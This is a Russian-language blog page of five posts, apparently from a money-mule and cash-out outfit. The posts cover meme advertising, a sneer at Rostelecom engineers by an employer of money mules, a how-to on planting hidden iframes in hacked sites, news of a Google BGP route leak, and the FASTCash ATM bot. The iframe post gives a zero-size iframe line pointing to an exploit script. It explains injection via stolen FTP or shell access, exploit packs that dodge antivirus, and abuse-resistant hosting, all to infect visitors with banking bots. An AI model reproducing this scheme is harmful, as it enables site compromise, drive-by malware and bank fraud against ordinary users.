Рубрика: Без рубрики

  • Бренды переходят на мемы при общении с поколением Z

    Бренды переходят на мемы при общении с поколением Z

    Крупные бренды, как правило, относятся к своим рекламным кампаниям серьезно, но когда им нужно покорить поколение Z, то можно и посмеяться над собой, пишет Bloomberg. Агентство в своей статье отмечает, что теперь производители в попытке привлечь внимание молодежи обращаются не к популярным блогерам, а к мемам: «Подростки любят мемы, а бренды любят подростков».

    Роза Хутор переходит к оплате за мемы

    Поколение Z, представителям которого сейчас от семи до 22 лет, составляют крупнейшую группу потребителей в мире, покупательная способность которой только в США превышает $143 млрд, пишет Bloomberg. Аккаунты с мемами — один из самых быстрорастущих сегментов в Instagram, самой популярной соцсети у подростков, отмечает медиадиректор рекламного агентства Mekanism Кэрри Дино. «Я думаю, это действительно мощный инструмент для того, чтобы рассказать поколению Z и миллениалам о том, что представляет из себя ваш бренд и что он может дать им и их образу жизни», — говорит она.

    Подробнее: 

    • Раньше бренды пытались достучаться до молодежи в интернете с помощью платных постов у инфлюенсеров. Рынок такой рекламы, по данным исследовательской компании Markets and Markets, в этом году составит $5,5 млрд (через пять лет компания прогнозирует его рост до $22,3 млрд). Однако посты блогеров из-за избытка рекламы уже не вызывают такого доверия у подписчиков, отмечает Bloomberg.
    • Саркастичные интернет-мемы в этой ситуации становятся альтернативой. В отличие от «отшлифованных» постов инфлюенсеров мемы разговаривают с подростками на понятном им языке. К тому же мем с большей вероятностью станет вирусным в интернете. Обычный блогер может предложить подписчице купить определенную помаду или поделиться рекламным постом с подругой, которая любит косметику. Но «шансы на то, что она поделится им с 20 своими друзьями, невелики» — в отличие от какой-нибудь забавной картинки, объясняет Бека Александр, основательница и президент агентства Socialyte, которое работает с блогерами.
    • Размещение платных постов в аккаунтах с мемами в Facebook и Instagram дает вовлеченность аудитории на уровне 30%, тогда как в традиционных кампаниях и в популярных блогах она составляет от 1% до 15%, говорит Дино. Кроме того, мем примерно на 60% дешевле обычного рекламного поста у популярного блогера, отмечает Зинат Салими, глава отдела маркетинга еще одного работающего с инфлюенсерами агентства Viral Nation. По ее словам, пока что подобный пост может стоить от $300 до $5000, но по мере развития этого типа маркетинга цены будут расти.
    • Одними из первых использовать мемы в рекламе догадались технологические компании и сервисы знакомств Bumble и Hinge. Со временем спонсировать ироничный контент также начали JetBlue Airways и Budweiser, которые прежде использовали более традиционную рекламу.
    • Мемы — это «фантастический способ привлечь потенциальных клиентов там, где они уже тусуются», говорит креативный директор дейтингового сервиса Hinge Молли Федик. По ее словам, компания начала платить за ироничные посты о неудачных свиданиях и получила «абсолютно невероятные» результаты. Теперь Hinge планирует увеличить маркетинговый бюджет на этот формат.
    • Uber сотрудничает с блогером Джесси Марголисом, который ведет популярные аккаунты Overheard LA и Overheard New York с забавными комментариями о жизни в этих городах. Вместе они создали аккаунт Overheard Uber, куда выкладывают шутки об общении водителей и пассажиров.
    • Бренд Gucci в 2017 году начал сотрудничать с блогерами Лолой Таш и Николь Аргирис. Девушки после выпуска из колледжа завели Instagram-аккаунт MyTherapistSays, куда постили шутки о бесполезных диетах, карьерных неудачах и других злоключениях, с которыми сталкиваются их ровесники. Gucci привлекла их к рекламе новой линейки часов Le Marche des Merveilles. В результаты мемы Таш и Аргирис попали на страницы Vogue. С тех пор Таш успела поработать с таким компаниями, как Universal Music Group, Jet Blue и Uber.
    • По словам Таш, индустрия интернет-мемов еще молода, а потому сейчас нет четких правил для монетизации или размещения постов. Обычно за одну рекламную кампанию MyTherapistSays берет от $7000 до $20 000, говорит она.
    • Брендам, которые привыкли согласовывать каждую запятую в рекламных постах блогеров, в случае с мемами надо быть готовыми отпустить ситуацию и довериться авторам, предупреждает Александр из Socialyte. Попытки солидных корпоративных парней быть смешными иногда могут закончиться провалом, предупреждает она.
    • В мем-маркетинге есть и другие риски: некоторые такие посты уже привели к обвинениям в плагиате чужих шуток. Instagram ответил на это, заблокировав некоторые аккаунты с мемами, в том числе «миллионники».

  • Почему инженеры электросвязи становятся продажниками

    Почему инженеры электросвязи становятся продажниками

    Давно предупреждал инженеров электросвязи — если вы не развиваетесь, то рано или поздно превратитесь либо в дворника, либо в ассенизатора. О чем не предупреждал, каюсь, — так это о том, что локальный апокалипсис наступит прямо сейчас. Взять, например, сетевых инженеров  Ростелекома, которые бодро так искали, кого ещё подключить к интернету последние пару недель в Сочи и в Адлере. Скажете, инженеров заставляют работать продажниками — произвол и несправедливость? Лично я в этом совершенно не уверен.

    Главный Центр управления сетями связи Ростелеком

        Чтобы было сразу понятно, о чем речь, готов проиллюстрировать свою мысль как работодатель. Мы ведь имеем здесь потенциальный конфликт в отношениях между работником и Ростелекомом, верно? И пока возмущенная общественность твердо стоит на стороне работника, предлагаю посмотреть чуть шире — не со стороны работодателя даже, а так, сбоку.

    Давайте возьмем, например, меня — типичного работодателя. Так случилось, что на меня работает некоторое количество весьма лояльных и толковых людей, чей высококвалифицированный труд оплачивается соответственно. Реально не хочу хвалиться, но мои работники меня ценят и уважают. Это у нас вроде как взаимно. Осмелюсь предположить, что уровень взаимопонимания у нас даже выше, чем между средним инженером электросвязи и его начальником в Ростелекоме.

    И вот как вы думаете, могу ли я, при всем этом взаимном уважении, предложить моему дроповоду, или оператору процессинга, или программисту выйти на улицу, зайти в первый попавшийся на их пути многоквартирный дом и начать ломиться в каждую квартиру предлагая подключить интернет и телевидение от Ростелеком? Ещё смешнее было бы предложить этим людям почистить снег возле нашей штаб-квартиры. Насколько, как вы полагаете, этот запрос будет успешным? И насколько изменится уровень взаимного уважения между мной и моими сотрудниками, если я в здравом уме предложу такую задачу к немедленной реализации?

    Не буду вас мучить загадками дальше и сразу сообщу верный ответ: ничего не выйдет. Мой дроповод и программист счищают снег исключительно в охотку и только с собственных сноубордов или автомобилей. И даже если бы они вдруг захотели почистить снег на улице вместо отправки дропов к банкоматам и процессинга денег на их банковские карты, я в здравом уме все равно не разрешу это делать. Даже если вокруг нашей штаб-квартиры вдруг образуется страшный дефицит дворников и уборщиц. Даже в случае 10-балльного снегопада.

    А вот вам новый интересный вопрос, за одно проверим, насколько вы хорошо меня знаете и как давно читаете нашу ленту — Как вы думаете, почему я не разрешу им этого делать? Из соображений гуманности?

    Так вот, в целом всем известно, что я очень гуманный человек. Но легко догадаться, что именно в данном конкретном случае гуманность ни при чем — ничего личного, только бизнес. Дело в том, что я не беру на работу бестолковых и бесполезных людей. Напротив, упорно выбираю на форумах и в социальных сетях самых толковых. Именно поэтому на зарплату рядового сотрудника, который на меня работает головой, можно нанять бригаду рядовых дворников, которые работают лопатой. А за то время, пока я искал каждого из них, рядовой дворник может почистить половину Дубовой Рощи.

    Скажу еще проще: чистить снег руками дроповода или оператора процессинга — это как чистить снег новым айпэдом. Очень неудобно и очень дорого. И потом придется искать новый айпэд. То есть грамотного оператора процессинга крипты, который умеет работать со SWIFT, а я своё время почему-то ценю.

    Взять, например, массовые увольнения. Было бы начальникам в Ростелекое проще за пару недель набить свой узел доступа или дата центр новыми инженерами электросвязи, договориться с клиентами, чтобы не возмущались из-за возможных простоев оборудования и перерывах в предоставлении услуг связи, рассчитать уволившихся, обустроить новых? Это проще, чем просто нанять дворников? Могу предположить, что нет — но, к счастью, никто не уволился. Ведь инженер электросвязи не может просто взять и уволиться из Ростелекома, как программист, оператор процессинга крипты или дроповод, хотя… почему?

    Или вот второй вариант — инженеры электросвязи пошли бы впаривать услуги подключения к интернет и телевидению от Ростелекома вместо дежурства и проведения плановых работ на узлах доступа и в дата центрах Ростелекома. А потом занесли бы заявления своему начальнику: так мол и так, по вашему распоряжению ходил по квартирам, предлагал населению подключиться к сети интернет и цифровому телевидению, всё от звонка до звонка — в прямом смысле. Прошу оплатить мне каждый отработанный час по стандартной ставке. Что на это мог бы сказать начальник из Ростелекома? Но, к счастью, инженеры электросвязи Ростелекома ходят по знакомым предлагая подключиться к интернет от Ростелекома в нерабочее время и абсолютно бесплатно, видимо в своё удовольствие. Заявлений начальникам не писали потому, что деньги за удовольствие брать стыдно. Или была другая причина?

    И, наконец, третий пункт — самый главный, который не дает мне покоя. Как вы думаете, что могли бы сделать начальники в Ростелекоме, если бы инженеры электросвязи им просто сказали: «Нет, не пойдем». И реально бы взяли и не пошли. Ну вот прямо как мои сотрудники на их месте. Это правда могло бы немного все осложнить, верно? И почему для инженеров электросвязи вдруг это оказалось непосильной задачей?

    Я мог бы оставить вас помедитировать над этими вопросами самостоятельно. Но как я уже сказал, я гуманный человек. Поэтому прямо сейчас объясню, почему инженеры электросвязи Ростелекома согласились ходить по квартирам и предлагать населению подключиться к интерент и телевидению от Ростелекома, причем абсолютно добровольно и без всякой оплаты.

    Все дело в том, что инженеры электросвязи Ростеекома до смерти боятся увольнений, и именно это (как ничто другое) резко отличает их от толковых сотрудников вроде тех, которые работают в моей компании. Увольнение — это вообще самый жуткий страх для инженера электросвязи и людого менеджера среднего звена Ростелекома. Это нечто среднее между концом светом по календарю Майя и атакой инопланетян. После увольнения жизни нет, — это знает всякий, кто работает на рядовой должности в Ростелекоме и любой другой полугосударственной компании. Я не знаю, откуда они это берут — вероятно, это сакральное знание выдается вместе с должностной инструкцией инженера электросвязи.

    Иррациональный страх увольнения, кстати, становится частично рациональным у всех, кто не учился в последние пять-десять лет. Если не считать обучение тому, как лучше выполнять разные нелепые инструкции своего начальника из Ростелекома, противоречащие друг другу, и абсурдные требования вышестоящих директоров филиала, и это вполне закономерная расплата за лень.

    Поймите, что если вы не учите себя сами, то вы перестаете быть ценным специалистом. За вами не бегают хедхантеры из вузов и платных школ. Вы понятия не имеете, куда бежать, если вас вдруг уволят из Ростелекома, и поэтому вместо повышения квалификации вы начинаете учиться тому, как быть удобным и в свободное от работы время впаривать услуги подключения к сети интернет и цифровому телевидению от Ростелеком. И вот тогда — именно тогда вы находите себя ходящим по квартирам в попытке впарить населению хоть что-нибудь или ещё хлещё во дворе дата центра Ростелекома с лопатой в руках, чистящим снег, и это только начало!

     

    Если хорошо подумать о перспективе, то можно вспомнить, что управление сетями связи с каждым годом упрощается и автоматизируется, и вероятно, в скором будущем Ростелекому уже не нужно будет такое количество инженеров электросвязи, а вот глобальное потепление с аномальными снегопадами и ураганами уже на пороге. Значит, дворников нужно будет больше — в Питере и Хабаровске их уже и так не хватает. Сложите одно и другое, и вы сразу поймете, какие перспективы имеют инженеры электросвязи, добровольно выполняющие тупые приказы своего начальника.
  • Кому и зачем нужен iFrame трафик и причём тут дроповоды и обнал

    Кому и зачем нужен iFrame трафик и причём тут дроповоды и обнал



    Трафик — на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф — это смешаный трафик нескольких стран стразу.
    как конвертировать трафик в просмотры AdSense
    Для чего нужен трафик?
    В своей основе iFrame трафик реальные дроповоды используют в своих схемах для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

    Где взять трафик?
    Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок…

    Чтобы иметь трафик дроповодам darkmoney нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме — это самый надёжный вариант.

    Для чего мне нужны FTP и Shell и что мне с ними делать?
    iFrame — это код HTML внутри страницы. С помощью iFrame дроповод darkmoney может вставлять один HTML документ в другой! Проще говоря, iFrame — это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

    Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
    Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:

    <iframe src=»http://site.ru/sploit.php» width=»0″ height=»0″ frameborder=»0″></iframe>

    где:

    http://site.ru/sploit.php — это сайт на который пользователи site.ru будут заходить одновременно
    width=»0″ длина равна 0
    height=»0″ высота равна 0
    frameborder=»0″ граница фрейма равна 0

    Что делать с Iframe?
    Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

    Что нужно для продажи трафика?
    Есть такая штука, как TDS — Traffic Direct System, — это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

    Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

    В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
    Ну вот и всё, теперь поговорим про загрузки.

    Что же такое эти загрузки?
    Загрузки — это загрузка и запуск файла на компьютере клиента банка или простого лоха, — один из самых распространённых методов распространения банковских ботов в сети Интернет.

    Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов…

    Загрузки — это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

    Что нам нужно для того чтобы делать загрузки?
    Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

    Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

    Теперь про связку сплоитов
    Exploit — это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
    А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

    Что же такое пробив связки?
    Пробив — это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился — тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

    Как делать загрузки?
    Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site.com/svjzka.php — значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

  • Как угнать IP трафик Google при помощи BGP

    Как угнать IP трафик Google при помощи BGP

    В минувший понедельник многие службы Google оказались недоступны для некоторых пользователей интернета. Причина – очередная утечка маршрутов BGP, из-за которой трафик перенаправлялся через Россию, Китай и Нигерию. Чем именно был вызван инцидент, проблемами с конфигурацией или кибератакой, пока непонятно.

    Протокол Border Gateway Protocol (BGP) предназначен для управления глобальными маршрутами передачи данных через сеть интернет. Перехват BGP сессий и утечка BGP маршрутов возникают, когда преднамеренно или случайно происходит захват или префиксов групп IP-адресов путем повреждения таблиц маршрутизации, хранящих путь к заданной сети определённого маршрутизатора, как правило одного из крупных транзитных провайдеров сети интернет.

    По данным компании ThousandEyes, специализирующейся на мониторинге сети, утечка маршрутов BGP произошла в понедельник, когда трафик, предназначавшийся для Google Search, G-Suite и различных других служб Google Cloud, был перенаправлен через российскую компанию «ТрансТелеком» AS20485, нигерийского интернет-провайдера MainOne AS37282 и китайскую государственную компанию China Telecom AS4809.

    Подозрительное обновление маршрута к сети 216.58.192.0/19 показывающее наилучший маршрут к Google через Россию, Китай и Нигерию

    Как сообщили эксперты из BGPmon, инцидент затронул 212 уникальных BGP префиксов Google.

    «По результатам проведенного нами анализа, источником утечки является межсетевое взаимодействие между нигерийским провайдером MainOne и китайской China Telecom. Межсетевое взаимодействие между MainOne и Google в штатном режиме осуществляется через нигерийскую точку обмена интернет-трафиком в Лагосе и имеет прямые маршруты к Google, которые утекли к China Telecom при помощи изменения в таблице маршрутизации BGP нигерийского провайдера», – пояснили в ThousandEyes.

    Как уже ранее сообщалось нами, китайская государственная интернет компания China Telecom была неоднократно уличена в систематическом перехвате интернет-трафика с целью хищения интеллектуальной собственности.

    Кроме того, с недавних пор изменение таблиц маршрутизации крупных транзитных интернет провайдеров с целью угона IP трафика определённой компании и дальнейшего его перехвата, стало возможным довольно широкому кругу лиц благодаря использованию программного обеспечения под названием LOKI 0.2.7, скомпилированного на языке Python для платформы Windows x64.   

  • Сналить деньги из банкомата можно даже при нулевом балансе с помощью банковского бота FASTCash

    Сналить деньги из банкомата можно даже при нулевом балансе с помощью банковского бота FASTCash

    SAP — один из основных элементов инфраструктуры банкоматов и терминалов PoS, он устанавливает соединение с основной банковской системой для валидации пользователя, чтобы можно было произвести транзакцию.

    схема кражи денег из банкоматов

    Мы проанализировали десять образцов банковских ботов, связанной с FASTCash, и обнаружили, что нарушители удаленно атаковали серверы переключения приложений (Switch Application Servers, SAP) нескольких банков. Каждый раз при использовании банкомата или терминала PoS в магазине, ПО обращается к SAP для валидации пользователя. В зависимости от того, доступна ли сумма на счету, транзакция может пройти или не пройти.

    В результате появилась более подробная информация о схеме безлимитного снятия денег из банкоматов, которой успешно пользуется северокорейская хакерская группа Hidden Cobra. Техническую информацию опубликовала команда US-CERT, подразделение Министерства внутренней безопасности США. Речь об атаке, названной FASTCash, северокорейская хак-группа использует ее еще с 2016 года.

    Банковский бот, установленный на серверы SAP, перехватывает запрос на транзакцию с платежной картой дропа с минимальным или даже нулевым балансом и передает поддельный положительный ответ, без собственно обращения к банковской системе для валидации доступного баланса. Таким образом, банкомат выдает наличные дропу, даже не уведомив р выдаче банк. По оценке доверенных источников, за два с лишним года группе Hidden Cobra удалось обналичить уже десятки миллионов долларов.

    Пока неизвестно, как произошло изначальное заражение банков ботом FASTCash, но власти США предполагают целевой фишинг: вероятно, исполняемый файл рассылали сотрудникам банков по электронной почте. Банковский бот заражал компьютер сотрудника, давая нарушителю доступ во внутреннюю сеть банка, где он разворачивал банковского бота в подсистеме SAP.

    Атаке FASTCash подверглись банки в Азии, Африке и, возможно, США. US-CERT рекомендует банкам использовать двухфакторную аутентификацию пользователей для доступа к серверам SAP и другие меры предосторожности. Также можно скачать индикаторы компрометации (IOS) для защиты от действий Hidden Cobra.

    Группировка Hidden Cobra также известна как Lazarus Group или Guardians of Peace. Она якобы пользуется поддержкой правительства Северной Кореи. Hidden Cobra известна многочисленными атаками на организации, связанные с медиа, аэрокосмической отраслью и финансами и государственные структуры по всему миру. Ранее Hidden Cobra связывали с шифровальщиком WannaCry и атаками в том числе на Sony Pictures в 2014 и банковскую систему SWIFT в 2016 году.